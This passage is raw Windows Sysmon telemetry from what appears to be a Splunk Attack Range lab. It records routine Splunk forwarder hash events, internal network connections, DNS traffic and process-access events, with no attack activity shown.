Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:05.770{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1C972AED859664193333ABFBE091561,SHA256=906EE457CA7B15F5C389EDA6EC1C01058AE0E5E9BF7C7F5A34E48D465F0EEA82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213942Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:05.479{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C4A131DFAC03772D86776571E8973C0,SHA256=C6B15DE237AA829C5F07FFA6C61F0100D5DD45B45912F3E5DAA80F547A2C054C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:06.817{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CE19D8ECC206E4DE89298FF25A81DCA,SHA256=6E8A4DB9827F43CE52FBF3B8EE123FE758622E1E639E6CEEC1D3C3D9C449BB97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213943Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:06.620{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA1E29B495E6ABA951671AB8E7514540,SHA256=785BC5C499D4A8AB5A787AEC4324FEABBE8FD2484D0E93D4956B8B5F362B1B48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213944Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:07.838{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE4593F28239D59FB111743C508A2471,SHA256=4F92163D2DCE19826A1870FA334BBA0738198AE4039B6B57FF55B6FAB3CC130D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:07.832{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0DD557D0F9A2EC67EFBC150C3CEC46A,SHA256=5EC3AF28FEC53BDD2DDAD084B9607362567852612A6EF72843BF3494CDE10EFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213945Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:08.885{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=630D85EDEE2D1404255AB415D897A448,SHA256=66DB267A77C450C39A0C49149A570D338C1BA70B022719E84350BA186B776AD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:08.832{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E61F79F8049BAB59C286ACAD4C5963C5,SHA256=F1CF5D4F03E975447B833585B0434E916672DBB0EE2929A8E2D18FD5F88F23C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:09.863{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E11A68959B4BA2C87CCDFC3F6B1E35C,SHA256=7A494CA1D40A62ACA1AE09F0855F4DDD6FA4B45930897AB2FD2FF3BA7AD190C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213947Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:09.885{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=951DE60C37D9B1FED8F13D5B10304F03,SHA256=D3FF3C525CBF95AD3BF7C01C9349131D339E83113623A53B28E73AD022F4847B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213946Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:06.541{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51155-false10.0.1.12-8000- 354300x8000000000000000284851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:06.622{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53207-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000213948Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:10.901{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=107D481838D857A927378310EDD8463F,SHA256=7498CC07240FD07A142EC4476AA6F91D82E4BCE0E05BDF0173CA43628A9A86D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213949Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:11.916{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95261E6B976DBB5A7DC93A7A7D197C5E,SHA256=625D7D1EC4607C159F73F89FFA7CB3FBECA69CA4255A24963B614040EABBC6A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:11.535{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F96F303C4B935F60FD4D8274D0E813C,SHA256=52A12F120A1E3A2A77794E36B8FA468E263FE9F81F39A2C8E71C168C38D9B9F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:11.535{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E634D6BA0AF8466D0689FECC6662D46,SHA256=2656696DA569555FF17A24F95B4E1EEFD3F5BC98614B7FD8B44BC164091F4BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:11.020{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9F276D5A1D27C50D73432B8B094578C,SHA256=59F9A7DDF6588041C2755B786EE4952FAF9E9FE74AC72518CB7AF517872B81AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213950Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:12.916{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37C6547E9EF3D7A1035CF6C6368FBEA4,SHA256=0C4B7320B644876879BA9243D404E982AAC2D4E814F43526DF276FC8BCD45C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:12.020{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD635E0501B89F56C0831D22C895E590,SHA256=78BAFCD01A3405258B99D54426BB7F801AFDCEB4B53BBB60982752E20CFD97BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213951Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:13.932{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=312AAE2FB32062C7C17AE31921690826,SHA256=536B0149B98C107C619F8F6AFAE1EA76CD6E4773F6656CCF275AFEB40EE0CD10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:13.035{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E9DA02C22A5A6DEA2AA93D2ED42B30A,SHA256=CEAD1E0FD5CF6068663E4E6B35FE651EDD1A134E0FB761D0647DF09153487ACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213952Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:14.932{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0857BDE2BB8CF72173FA67FF1BBC103D,SHA256=DB180589E29699648618A0392AC8CA47DC29ED7CC0527B58612E90604F18A268,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:12.486{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local61588- 354300x8000000000000000284860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:12.485{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61658- 354300x8000000000000000284859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:11.654{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53208-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:14.067{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABD280989A88651D16684D6E75284089,SHA256=A994790E445CB201730393E60F84B5C749855FB9839FB91E9435F1ACE1BF7665,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213954Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:15.948{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F175E4DF5C188CA3779FBCB5B7A5D46D,SHA256=731445CE74B65E046AC6788E13049F5E92D1E287FF75313D46FA2E3A0DFA0442,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:15.238{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2D925C4E478FD496EF1F76F59268ACD,SHA256=8E334E3C7617E7E82495E5F1409D716BFA64D78B6F954A4B95B29728D67D57A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213953Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:12.516{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51156-false10.0.1.12-8000- 23542300x8000000000000000213955Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:16.963{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E28B07207CFD268AA5D8AABE524DBC5D,SHA256=16F819984775F443BA395F086E190BB546F774935963DA79B38432482C7C4716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:16.254{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=158C6A4E5930B1B4294D159EBC04446A,SHA256=F015D5BFD7E53CEFD9BC0FA74103A00AE4DBFCEE0861CB95058D387E5A891BED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213956Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:17.979{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE8303BC5DFC6C4AAB47D3331C34D8D6,SHA256=4E4B71A29AC0F40B1187FBF8E04A9B908F0605DA89EBD91E6F357A62E17B16D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:17.285{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A28521DC14F01FD12D9531D1C17BD2D,SHA256=BF14227AC82AD6D97C9317008665D52D7F1DC3B9588F787C1B6E0F818C20FA8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213957Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:18.979{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A902A5AEF30FC22054341FE8EF69ED7D,SHA256=05F91C445876D1C50E7A158EDE3AD4A203554EC6876CD8347CA974B2E6E12FB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:18.301{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0210D855E7FABCDA4F2C987F209318A3,SHA256=7012BCDEA3C3EB634A7D3B5A894DD6BA8D9D47345DE176DA64A8E38BBC01A9E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:19.926{C8EA50B7-0DE7-6216-9A04-000000003802}1721388C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:19.676{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0DE7-6216-9A04-000000003802}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:19.676{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:19.676{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:19.676{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:19.676{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:19.676{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0DE7-6216-9A04-000000003802}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:19.676{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0DE7-6216-9A04-000000003802}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:19.677{C8EA50B7-0DE7-6216-9A04-000000003802}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 